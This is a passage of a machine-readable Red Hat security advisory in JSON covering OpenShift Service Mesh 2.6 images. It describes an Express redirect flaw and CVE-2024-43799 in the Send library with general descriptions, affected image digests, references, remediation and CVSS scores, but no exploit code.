"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "express: Improper Input Handling in Express Redirects"
},
{
"cve": "CVE-2024-43799",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:30.869487+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311153"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "send: Code Execution Vulnerability in Send Library",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43799"
},
{
"category": "external",
"summary": "RHBZ#2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35",
"url": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg",
"url": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg"
}
],
"release_date": "2024-09-10T15:15:17.727000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
